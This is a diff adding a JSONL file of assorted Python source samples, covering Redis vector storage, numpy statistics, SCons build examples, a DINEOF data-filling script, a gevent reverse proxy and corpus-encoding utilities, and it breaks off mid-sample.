diff --git "a/1681.jsonl" "b/1681.jsonl" new file mode 100644--- /dev/null +++ "b/1681.jsonl" @@ -0,0 +1,596 @@ +{"seq_id":"119237579","text":"# -*- coding: utf-8 -*-\n\n# Copyright (c) 2013 Ole Krause-Sparmann\n\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# -*- coding: utf-8 -*-\n\n# Copyright (c) 2013 Ole Krause-Sparmann\n\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\nimport redis\nimport json\nimport numpy\n\nfrom nearpy.storage.storage import Storage\nfrom nearpy.utils import want_string\n\n\nclass RedisStorage(Storage):\n \"\"\" Storage using redis. \"\"\"\n\n def __init__(self, redis_object):\n \"\"\" Uses specified redis object for storage. 
\"\"\"\n self.redis_object = redis_object\n\n def store_vector(self, hash_name, bucket_key, v, data):\n \"\"\"\n Stores vector and JSON-serializable data in bucket with specified key.\n \"\"\"\n redis_key = 'nearpy_%s_%s' % (hash_name, bucket_key)\n\n # Make sure it is a 1d vector\n v = numpy.reshape(v, v.shape[0])\n\n val_dict = {'vector': v.tolist()}\n if data:\n val_dict['data'] = data\n\n self.redis_object.rpush(redis_key, json.dumps(val_dict))\n\n def get_bucket(self, hash_name, bucket_key):\n \"\"\"\n Returns bucket content as list of tuples (vector, data).\n \"\"\"\n redis_key = 'nearpy_%s_%s' % (hash_name, bucket_key)\n items = self.redis_object.lrange(redis_key, 0, -1)\n results = []\n for item_str in items:\n val_dict = json.loads(want_string(item_str))\n vector = numpy.fromiter(val_dict['vector'], dtype=numpy.float64)\n if 'data' in val_dict:\n results.append((vector, val_dict['data']))\n else:\n results.append((vector, None))\n\n return results\n\n def clean_buckets(self, hash_name):\n \"\"\"\n Removes all buckets and their content for specified hash.\n \"\"\"\n bucket_keys = self.redis_object.keys(pattern='nearpy_%s_*' % hash_name)\n for bucket_key in bucket_keys:\n self.redis_object.delete(bucket_key)\n\n def clean_all_buckets(self):\n \"\"\"\n Removes all buckets from all hashes and their content.\n \"\"\"\n bucket_keys = self.redis_object.keys(pattern='nearpy_*')\n for bucket_key in bucket_keys:\n self.redis_object.delete(bucket_key)\n","sub_path":"nearpy/storage/storage_redis.py","file_name":"storage_redis.py","file_ext":"py","file_size_in_byte":3414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"435843777","text":"# Problem: Need to run statistical functions on the contents of a matrix\n\nimport numpy as np\n\n# create matrix\nmatrix = np.array([\n [1,2,3],\n [4,5,6],\n [7,8,9]\n])\n\n# return mean\nprint(\"Matrix mean: \" + str(np.mean(matrix)))\n\n# return variance\nprint(\"Matrix 
variance: \" + str(np.var(matrix)))\n\n# return std-dev\nprint(\"Matrix std: \" + str(np.std(matrix)))\n","sub_path":"data_objects/matrix_stats.py","file_name":"matrix_stats.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"529920584","text":"import p5d\n\n# Learning Processing\n# Daniel Shiffman\n# http://www.learningprocessing.com\n\n# Example 4-3: Varying variables\n\n# Declare and initialize two integer variables at the top of the code.\ncircleX = 0\ncircleY = 100\n\ndef setup():\n pg.size(480, 270)\n\ndef draw():\n pg.background(255)\n pg.stroke(0)\n pg.fill(175)\n # Use the variables to specify the location of an ellipse.\n pg.ellipse(circleX, circleY, 50, 50)\n\n # An assignment operation that increments the value of circleX by 1.\n circleX = circleX + 1\n\npg = p5d.PGraphics()\npg.setupFunc(setup)\npg.drawFunc(draw)\npg.listen()","sub_path":"clients/Python/Example_04_03.py","file_name":"Example_04_03.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"340553529","text":"from PIL import Image\nimport numpy as np\nimport math\nimport variables as var # file of picture size and filename\n\n\ndef png2txtFile(_nmbrOfNeurons):\n\n for i in var.lettersAvailable:\n img = Image.open(var.directoryPNG + str(i));\n img = img.convert('L'); # L for luminescence\n caractere = np.fromiter(iter(img.getdata()), np.int) # convert pic to matrix\n caractere.resize(img.height, img.width); # resize to the good size the matrix\n\n caractere[caractere < 128] = 1;\n caractere[caractere >= 128] = -1;\n\n # caractere = -1 * caractere;\n\n arr = np.full((var._picSize_X, var._picSize_Y), -1, dtype=np.int); #dtype - data type\n\n arr = caractere;\n\n np.savetxt(var.directoryTXT + str(i) + '.txt', arr, delimiter=',', fmt='%i',newline ='\\n'); # fmt = %i = format integer\n\n\ndef 
loadReferences(_nmbrOfNeurons):\n # lettersMaj = np.array(['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']);\n # lettersMin = np.array(['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']);\n # carac = np.array(['!', '#', '&', '*', '(', ')', '_', '-', '+', '=', '[', ']', '\\ ', '\"', \"'\", ':', ';', '?', '.', '>', '<', ',']);\n # numbers = np.array(['1', '2', '3', '4', '5', '6', '7', '8', '9', '0']);\n # numbersreduce = np.array(['1_', '2_', '3_', '4_', '5_', '6_', '7_', '8_', '9_', '0_']);\n\n\n # letters = np.concatenate((lettersMaj, lettersMin, carac, numbers, numbersreduce));\n # letters = np.array(['1', '2', '3', '4', '5', '6', '0']);\n # letters = lettersMaj;\n\n png2txtFile(_nmbrOfNeurons);\n\n arr = np.full((var.lettersAvailable.size, _nmbrOfNeurons), 0, dtype=np.float32); #\n for i in range(var.lettersAvailable.size):\n temp = np.loadtxt(var.directoryTXT + str(var.lettersAvailable[i]) + '.txt', delimiter = ',', dtype=np.float32);\n # print(temp[temp ==-1].size)\n arr[i,:] = temp.flatten(); # flatten = transform a matrix into a singular long array\n\n return arr;\n\ndef loadPattern(filename, _nmbrOfNeurons):\n\n img = Image.open(filename);\n img = img.convert('L');\n\n caractere = np.fromiter(iter(img.getdata()), np.float32)\n caractere.resize(img.height, img.width);\n\n\n caractere[caractere < 128] = 1;\n caractere[caractere >= 128] = -1;\n\n # caractere = -1 * caractere;\n\n arr = np.full((var._picSize_X, var._picSize_Y), -1, dtype=np.int)\n arr = caractere;\n\n temp = arr;\n temp = temp.astype(np.uint8)\n img = Image.fromarray(temp);\n img = img.resize((var._picSize_X * 7, var._picSize_Y * 7))\n img.show(title = \"Picture after 0 iterations\");\n # print(filename)\n # pause\n arr = arr.flatten();\n return 
arr;\n","sub_path":"mod.py","file_name":"mod.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"337155983","text":"import os\nimport sys\nimport SCons.Script\nfrom SCons.Environment import Environment\n\n# Setup the construction env\ntools = ['gcc']\nenv = Environment(tools=tools)\nenv.EnsureSConsVersion(3, 0, 0)\n\n#env.Replace(ENV=os.environ)\nenv.Replace(ENV={'PATH': os.environ['PATH']})\n\n# Compiler commands\n# This is just because I happen to have the arm version of gcc setup on windows at the time\nenv.Replace(CROSS_COMPILE='arm-none-eabi-')\n\nenv.Replace(AS='${CROSS_COMPILE}as')\nenv.Replace(CC='${CROSS_COMPILE}gcc')\nenv.Replace(CPP='${CROSS_COMPILE}gcc')\nenv.Replace(CXX='${CROSS_COMPILE}g++')\nenv.Replace(LD='${CROSS_COMPILE}ld')\nenv.Replace(OBJCOPY='${CROSS_COMPILE}objcopy')\nenv.Replace(SIZE='${CROSS_COMPILE}size')\nenv.Replace(STRIP='${CROSS_COMPILE}strip')\nenv.Replace(AR='${CROSS_COMPILE}ar')\n\n\n# Lets try adding some cpppath's\nenv.AppendUnique(CPPPATH=[env.GetLaunchDir()])\nenv.AppendUnique(CPPPATH=['testdir'])\nenv.AppendUnique(CPPPATH=['../src1 with spaces'])\n\n# The first 3 examples below work fine with CPPPATH\n\ndef example1():\n # At this stage we're testing the wrappering of CPPPATH with quotes for include directories\n # This works fine / is properly quoted and escaped\n env.Object('src1.o', '../src1 with spaces/src1.c')\n\ndef example2():\n # Use Command with action\n # This works fine / is properly quoted and escaped\n act = SCons.Action.Action('${CPP} ${CFLAGS} ${CCFLAGS} ${_CCCOMCOM} -c -o ${TARGET} ${SOURCES}')\n env.Command('src1.o', '../src1 with spaces/src1.c', act)\n\ndef example3():\n # Use Command with string\n # This works fine / is properly quoted and escaped\n env.Command('src1.o', '../src1 with spaces/src1.c',\n '${CPP} ${CFLAGS} ${CCFLAGS} ${_CCCOMCOM} -c -o ${TARGET} ${SOURCES}')\n\n\n\n\n# These examples are not escaped 
/ quoted properly for CPPPATH when one of the directories has a space in\n\ndef example4():\n # Builder using a string\n # No quoting for CPPPATH in ${_CCCOMCOM}\n bld = env.Builder(\n action='${CPP} ${CFLAGS} ${CCFLAGS} ${_CCCOMCOM} -c -o ${TARGET} ${SOURCES}')\n env.AppendUnique(BUILDERS={'Example4': bld})\n env.Example4('src1.o', '../src1 with spaces/src1.c')\n\ndef example5():\n # This would work if we used SCons.Action.Action instead\n bld = env.Builder(\n action=env.Action('${CPP} ${CFLAGS} ${CCFLAGS} ${_CCCOMCOM} -c -o ${TARGET} ${SOURCES}'))\n env.AppendUnique(BUILDERS={'Example5': bld})\n env.Example5('src1.o', '../src1 with spaces/src1.c')\n\n\ndef example6():\n # This wont pick up on target or source, or escape CPPPATH\n bld = env.Builder(action=__Build_example6)\n env.AppendUnique(BUILDERS={'Example6': bld})\n env.Example6('src1.o', '../src1 with spaces/src1.c')\n\ndef __Build_example6(target, source, env):\n act = env.Action('${CPP} ${CFLAGS} ${CCFLAGS} ${_CCCOMCOM} -c -o ${TARGET} ${SOURCES}')\n env.Execute(act)\n\n\ndef example7():\n # This wiil pickup on target or source, but not escape CPPPATH\n bld = env.Builder(action=__Build_example7)\n env.AppendUnique(BUILDERS={'Example7': bld})\n env.Example7('src1.o', '../src1 with spaces/src1.c')\n\ndef __Build_example7(target, source, env):\n tststr = env.subst('${CPP} ${CFLAGS} ${CCFLAGS} ${_CCCOMCOM} -c -o ${TARGET} ${SOURCES}',\n source=source, target=target)\n env.Execute(tststr)\n\n\nexample5()\n","sub_path":"example2/sconstruct.py","file_name":"sconstruct.py","file_ext":"py","file_size_in_byte":3294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"356461997","text":"# Copyright (c) 2020 Xiaomi Corporation (authors: Fangjun Kuang)\n# See ../../../../LICENSE for clarification regarding multiple authors\n\nfrom typing import Optional\nfrom typing import Union\n\nimport torch\nimport _k2\n\n\n# Create a class `RaggedFloat` in python for 
backprop.\n#\n# TODO(fangjun): wrap methods from _k2.RaggedFloat if needed.\nclass RaggedFloat(object):\n '''A ragged float tensor.\n\n It is a wrapper of :class:`_k2.RaggedFloat`, whose purpose\n is to implement autograd for :class:`_k2.RaggedFloat`.\n\n Currently, it is used only in `k2.ragged.normalize_scores`.\n '''\n\n def __init__(self,\n ragged: Union[str, _k2.RaggedFloat, _k2.RaggedShape],\n values: Optional[torch.Tensor] = None):\n '''Construct an instance of :class:`k2.RaggedFloat`.\n\n Args:\n ragged:\n It can be one of the following types:\n\n - A string. Example value::\n\n [ [1 2] [] [5 10 20] ]\n\n - An instance of :class:`_k2.RaggedFloat`\n\n - An instance of :class:`_k2.RaggedShape`. In this case, you\n have to provide the additional argument `values`.\n values:\n Required only when `ragged` is an instance of\n :class:`_k2.RaggedShape`. It is a 1-D torch.Tensor with dtype\n torch.float32.\n '''\n if isinstance(ragged, str):\n ragged = _k2.RaggedFloat(ragged)\n assert values is None\n elif isinstance(ragged, _k2.RaggedShape):\n assert values is not None\n ragged = _k2.RaggedFloat(ragged, values)\n\n assert isinstance(ragged, _k2.RaggedFloat)\n\n self.ragged = ragged\n if values is not None:\n self._values = values\n else:\n self._values = ragged.values()\n\n def __str__(self) -> str:\n return str(self.ragged)\n\n @property\n def values(self) -> torch.Tensor:\n '''Return the underlying array as a 1-D torch.Tensor.\n '''\n return self._values\n\n @property\n def grad(self) -> torch.Tensor:\n return self._values.grad\n\n @property\n def requires_grad(self) -> bool:\n '''\n Return True if this object requires grad.\n Return False otherwise.\n '''\n return self._values.requires_grad\n\n def requires_grad_(self, requires_grad: bool) -> 'RaggedFloat':\n '''Change if autograd should record operations on this tensor.\n\n Sets the `values`'s requires_grad attribute in-place.\n Returns this object.\n You can test whether this object has the requires_grad 
property\n true or false by accessing self.requires_grad property.\n\n Caution:\n This is an **in-place** operation as you can see that the function\n name ends with `_`.\n\n Args:\n requires_grad:\n If autograd should record operations on this object or not.\n\n Returns:\n This object itself.\n '''\n self._values.requires_grad_(requires_grad)\n return self\n","sub_path":"k2/python/k2/ragged/tensor.py","file_name":"tensor.py","file_ext":"py","file_size_in_byte":3068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"550258310","text":"__author__ = 'GCassani'\n\n\"\"\"Helper functions to pre-process the corpus\"\"\"\n\n\ndef get_pos_mapping(input_file):\n\n \"\"\"\n :param input_file: a .txt fil containing two elements per line separated by a white space. The first element of\n each line is used as a key in a dictionary, and the second value in the line is used as the\n corresponding value. If there duplicates among the first elements (the keys), the output\n dictionary will contain the corresponding second element (the value) from the last line in\n which the first element occurred.\n :return out_dict: a dictionary containing elements from the input file arranged in the specified way\n \"\"\"\n\n out_dict = {}\n\n with open(input_file, 'r') as f:\n for line in f:\n pos = line.rstrip(\"\\n\").split()\n out_dict[pos[0]] = pos[1]\n\n return out_dict\n\n\n########################################################################################################################\n\n\ndef encoding_features(corpus_name, reduced=True, uniphones=True, diphones=False, triphones=False, syllables=False,\n stress_marker=False, outcomes='tokens', boundaries=False, log='', verbose=True):\n\n \"\"\"\n :param corpus_name: a string indicating the name of the corpus being processed\n :param reduced: a boolean indicating whether reduced phonological forms are extracted from CELEX or not\n :param uniphones: a boolean indicating whether 
single phonemes are to be considered while encoding input\n utterances\n :param diphones: a boolean indicating whether sequences of two phonemes are to be considered while\n encoding input utterances\n :param triphones: a boolean indicating whether sequences of three phonemes are to be considered while\n encoding input utterances\n :param syllables: a boolean indicating whether syllables are to be considered while encoding input\n utterances\n :param stress_marker: a boolean indicating whether stress markers from the phonological representations of\n Celex need to be preserved or can be discarded\n :param outcomes: a string indicating which outcomes to use, whether 'tokens' (default) or 'lemmas'\n :param boundaries: a boolean specifying whether word boundaries are considered when training on full\n utterances\n :param log: the path to a file where the log is printed. Default is empty string, meaning that no\n file is provided and everything is printed to standard output.\n :param verbose: a boolean indicating whether to print information to screen (default is True)\n :return encoding_string: a string that tells which parameters where used to encode the corpus; it can be appended\n to file names to unequivocally determine which parameters were used to create a certain\n file and derived measures.\n \"\"\"\n\n desired_cues = []\n encoding_string = ''\n\n if reduced:\n encoding_string += 'r'\n else:\n encoding_string += 'f'\n\n if boundaries:\n encoding_string += 'b'\n else:\n encoding_string += 'c'\n\n if uniphones:\n desired_cues.append('uniphones')\n encoding_string += 'u'\n if diphones:\n desired_cues.append('diphones')\n encoding_string += 'd'\n if triphones:\n desired_cues.append('triphones')\n encoding_string += 't'\n if syllables:\n desired_cues.append('syllables')\n encoding_string += 's'\n\n if outcomes == 'tokens':\n encoding_string += 'k'\n elif outcomes == 'lemmas':\n encoding_string += 'l'\n else:\n raise ValueError(\"Unrecognized specification 
concerning lexical outcomes. \"\n \"Please, choose either 'tokens' or 'lemmas'.\")\n\n if stress_marker:\n desired_cues.append('with stress marker')\n encoding_string += 'm'\n else:\n desired_cues.append('without stress marker')\n encoding_string += 'n'\n\n num_hash = 120\n desired_cues = \", \".join(desired_cues)\n padding_cues = \" \" * (num_hash - 15 - len(desired_cues))\n padding_outcomes = \" \" * (num_hash - 19 - len(outcomes))\n padding_corpus = \" \" * (num_hash - 17 - len(corpus_name))\n if log:\n with open(log, \"w+\") as log_file:\n log_file.write(\"\\n\\n\")\n log_file.write(\"#\" * num_hash)\n log_file.write(\"\\n\")\n log_file.write(\"##### CORPUS: \" + corpus_name + padding_corpus + \"##\")\n log_file.write(\"\\n\")\n log_file.write(\"##### CUES: \" + desired_cues + padding_cues + \"##\")\n log_file.write(\"\\n\")\n log_file.write(\"##### OUTCOMES: \" + outcomes + padding_outcomes + \"##\")\n log_file.write(\"\\n\")\n log_file.write(\"#\" * num_hash)\n log_file.write(\"\\n\\n\")\n else:\n if verbose:\n print()\n print(\"#\" * num_hash)\n print(\"##### CORPUS: \" + corpus_name + padding_corpus + \"##\")\n print(\"##### CUES: \" + desired_cues + padding_cues + \"##\")\n print(\"##### OUTCOMES: \" + outcomes + padding_outcomes + \"##\")\n print(\"#\" * num_hash)\n print()\n\n return encoding_string\n","sub_path":"corpus/encode/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":5563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"197493657","text":"#import numpy.ma as ma\nimport netCDF4 as nc\nimport subprocess\nimport struct\nfrom os.path import expanduser\nimport os\n\ndineof_dir = 'derived/data_filling/chl_modis'\n\n# Begin function /dineof/\ndef dineof(data, mask, dineof_param_file):\n '''\n Purpose : Execute the DINEOF data filling algorithm using\n the tool downloaded from:\n http://http://modb.oce.ulg.ac.be\n Arguments : \n * data - nlat x nlon x T masked array of 
data to be filled.\n * mask - nlat x nlon boolean array indicating land pixels\n (data not to be completed).\n * path_to_dineof - path to the executable tool\n * dineof_param_file - path to the dineof file to set the \n parameters of the tool.\n Returns : \n * data_filled - nlat x nlon x T filled masked array\n * eofs - nlat x nlon x neof masked array of the EOF loadings\n of the filled data array.\n * s_values - neof vector of the singular values of the \n filled data array.\n * time_fct - T x neof matrix of the EOF time-series\n of the filled data matrix.\n Throws : none\n '''\n data = data.copy()\n data[data.mask] = np.nan\n ## prepare the data in NetCDF format for DINEOF program\n [nb_lats, nb_lons, T] = np.shape(data)\n\n # data file\n f = nc.Dataset(os.path.join(dineof_dir, 'data.nc'), 'w')\n f.createDimension('time', T)\n f.createDimension('lons', nb_lons)\n f.createDimension('lats', nb_lats)\n\n time = f.createVariable('time', 'd', ('time',))\n time[:] = np.arange(T)\n\n data_nc = f.createVariable('data', 'd', ('time', 'lons', 'lats'))\n data_nc[:, :, :] = np.transpose(data, [2, 1, 0])\n f.close()\n\n # mask file\n f = nc.Dataset(os.path.join(dineof_dir, 'mask.nc'), 'w')\n f.createDimension('lons', nb_lons)\n f.createDimension('lats', nb_lats)\n\n mask_nc = f.createVariable('mask', 'd', ('lons', 'lats'))\n tmp = np.ones([nb_lons, nb_lats])\n tmp[mask.T] = 0.\n mask_nc[:, :] = tmp\n f.close()\n\n # run dineof command\n# command = path_to_dineof + ' ' + dineof_param_file + '; exit 0'\n# output = subprocess.check_output(command, stderr=subprocess.STDOUT,\n# shell=True) ## TODO Security issue\n\n# print output\n # f = open( 'log', 'w' )\n # f.write( output )\n # f.close()\n\n# output_lines = output.splitlines()\n# index_recon = output_lines.index(\n# ' Minimum reached in cross-validation') - 2\n# exp_error = float(output_lines[index_recon].split()[1])\n\n# if cv_mode:\n# print exp_error\n# else:\n# exp_error = np.nan\n# print output\n\n## End function 
/dineof/\n\n## Begin setting DINEOF parameters\nparams = dict()\nparams[ 'data' ] = '[data.nc#data]'\nparams[ 'mask' ] = \"['mask.nc#mask']\"\nparams[ 'time' ] = \"'data.nc#time'\"\nparams[ 'alpha' ] = '0.005'\nparams[ 'numit' ] = '30'\n#\n# Sets the numerical variables for the computation of the required\n# singular values and associated modes.\n#\n# Give 'nev' the maximum number of modes you want to compute \nparams[ 'nev' ] = '30'\n#\n# Give 'neini' the minimum number of modes you want to compute \n#\nparams[ 'neini' ] = '2'\n#\n# Give 'ncv' the maximal size for the Krylov subspace \n# (Do not change it as soon as ncv > nev+5) \n# ncv must also be smaller than the temporal size of your matrix\n#\nparams[ 'ncv' ] = '56'\n#\n# Give 'tol' the treshold for Lanczos convergence \n# By default 1.e-8 is quite reasonable \n#\nparams[ 'tol' ] = '1.0e-8'\n#\n# Parameter 'nitemax' defining the maximum number of iteration allowed \n# for the stabilisation of eofs obtained by the cycle ((eof\n# decomposition <-> truncated reconstruction and replacement of missing\n# data)). An automatic criteria is defined by the following parameter\n# 'itstop' to go faster \n#\nparams[ 'nitemax' ] = '1000'\n#\n# Parameter 'toliter' is a precision criteria defining the threshold\n# of automatic stopping of dineof iterations, once the ratio \n# (rms of successive missing data reconstruction)/stdv(existing data) \n# becomes lower than 'toliter'. \n#\nparams[ 'toliter' ] = '1.0e-3'\n#\n# Parameter 'rec' for complete reconstruction of the matrix \n# rec=1 will reconstruct all points; rec=0 only missing points\n#\nparams[ 'rec' ] = '1'\n#\n# Parameter 'eof' for writing the left and right modes of the\n# input matrix. Disabled by default. To activate, set to 1\n#\nparams[ 'eof' ] = '1'\n#\n# Parameter 'norm' to activate the normalisation of the input matrix\n# for multivariate case. Disabled by default. To activate, set to 1\n#\nparams[ 'norm' ] = '0'\n#\n# Output folder. 
Left and Right EOFs will be written here \n#\nparams[ 'Output' ] = '.'\n#\n# user chosen cross-validation points, \n# remove or comment-out the following entry if the cross-validation \n# points are to be chosen \n# internally\n#\n# clouds = 'crossvalidation.clouds'\nparams[ 'clouds' ] = 'crossval_mask.dat'\n#print params['clouds']\n#\n# \"results\" contains the filenames of the filled data\n#\n#results = ['All_95_1of2.sst.filled']\n#results = ['Output/F2Dbelcolour_region_period_datfilled.gher']\n#\nparams[ 'results' ] = \"['chl.filled']\"\n# params[ 'results' ] = \"['chl.filled']\"\n#\n# seed to initialize the random number generator\n#\nparams[ 'seed' ] = '243435'\n#\n#\n#!-------------------------!\n#! cross-validation points !\n#!-------------------------!\n#\n#number_cv_points = 7000\n#\n#cloud surface size in pixels \n#params[ 'cloud_size' ] = '100'\n#\n#cloud_mask = 'crossvalidation.mask'\n# params[ 'cloud_mask' ] = 'crossvalidation.mask'\n#\n## End Setting DINEOF paramters\n\n## Begin function /genParamFile/\ndef genParamFile(params, param_file):\n str = ''\n for key in params:\n str += key + ' = ' + params[ key ] + '\\n'\n \n f = open(param_file, 'w')\n f.write(str)\n f.close()\n## End function /genParamFile/\n\n\n\n\n\n\n\n\n\n\n\n\nimport os\nimport scipy.io as sio\nimport numpy.ma as ma\nimport numpy as np\n\nchl = sio.loadmat(os.path.join(dineof_dir, 'chl.mat'))['chl']\nmask = sio.loadmat(os.path.join(dineof_dir, 'mask.mat'))['mask']\nchl = ma.masked_invalid(chl)\nchl = np.log(chl)\nchl_average = chl.mean(axis=2)\nT = chl.shape[2]\ndata = chl - np.tile(chl_average[:,:,np.newaxis], (1,1,T))\nmask = mask == 0\n\nparam_file = os.path.join(dineof_dir, 'dineof.init')\nsio.savemat(os.path.join(dineof_dir, 'chl_average.mat'), {'chl':chl_average.data})\n\ngenParamFile( params, param_file )\n\ndineof(data, mask, 
param_file)\n\n\n\n\n\n","sub_path":"scripts/data_filling/chl_modis_dineof/3_prepare_dineof.py","file_name":"3_prepare_dineof.py","file_ext":"py","file_size_in_byte":6392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"257593318","text":"#\n# Copyright 2016 iXsystems, Inc.\n# All rights reserved\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted providing that the following conditions\n# are met:\n# 1. Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# 2. Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR\n# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY\n# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS\n# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)\n# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,\n# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING\n# IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n#\n#####################################################################\n\nimport gevent\nimport socket\nimport logging\nfrom gevent.lock import RLock\n\n\nBUFSIZE = 4096\n\n\nclass ReverseProxyServer(object):\n def __init__(self):\n self.logger = logging.getLogger(self.__class__.__name__)\n self.proxies = {}\n self.rlock = RLock()\n\n def unix_to_tcp_proxy(self, listen, target):\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)\n s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n s.bind(('', listen))\n s.listen(1)\n\n def reader(cfd, sfd):\n buffer = bytearray(BUFSIZE)\n while True:\n try:\n n = sfd.recv_into(buffer)\n if n == 0:\n break\n\n cfd.sendall(buffer[:n])\n except OSError:\n break\n\n def writer(cfd, sfd):\n buffer = bytearray(BUFSIZE)\n while True:\n try:\n n = cfd.recv_into(buffer)\n if n == 0:\n break\n\n sfd.sendall(buffer[:n])\n except OSError:\n break\n\n while True:\n cfd, addr = s.accept()\n self.logger.debug('New client {0} on {1}'.format(addr, listen))\n\n sfd = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM, 0)\n sfd.connect(target)\n gevent.spawn(reader, cfd, sfd)\n gevent.spawn(writer, cfd, sfd)\n\n def add_proxy(self, listen, target, timeout=300):\n with self.rlock:\n self.logger.debug('Adding proxy from {0} to 0.0.0.0:{1}'.format(target, listen))\n worker = gevent.spawn(self.unix_to_tcp_proxy, listen, target)\n self.proxies[listen] = worker\n\n def remove_proxy(self, listen):\n with self.rlock:\n 
self.logger.debug('Adding proxy to 0.0.0.0:{0}'.format(listen))\n worker = self.proxies.get(listen)\n if not worker:\n return\n\n gevent.kill(worker)\n del self.proxies[listen]\n","sub_path":"src/containerd/src/proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":3446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"244952347","text":"#!/usr/bin/env python3\n\ndef show_choice():\n print('Choose:\\t1. Copy\\n\\t2. Zip\\n\\t3. Exit.')\n\ndef copy():\n print('Copy done.')\n\ndef zip():\n print('zip done.')\n\n\n\ndef wrong_choice():\n print('<<',c,'>> is not a correct answer!')\n\nshow_choice()\nwhile True:\n c=input('what is your choice?')\n try:\n c=int(c)\n except ValueError:\n print('Not a string!')\n if c==1:\n copy()\n break\n elif c==2:\n zip()\n break\n elif c==3:\n print('Good Bye!')\n break\n else:\n wrong_choice()\n\n","sub_path":"new_backup.py","file_name":"new_backup.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"444891137","text":"\n\n#calss header\nclass _LANCE():\n\tdef __init__(self,): \n\t\tself.name = \"LANCE\"\n\t\tself.definitions = [u'to cut the skin with a sharp tool in order to release infected matter that has collected under it: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_lance.py","file_name":"_lance.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"142397224","text":"import requests\nimport json\nfrom bs4 import BeautifulSoup\n\nurl = 'https://student.portal.chalmers.se/sv/chalmersstudier/Sidor/Lasarstider.aspx'\n\nresponse = requests.get(url)\n\nsoup = 
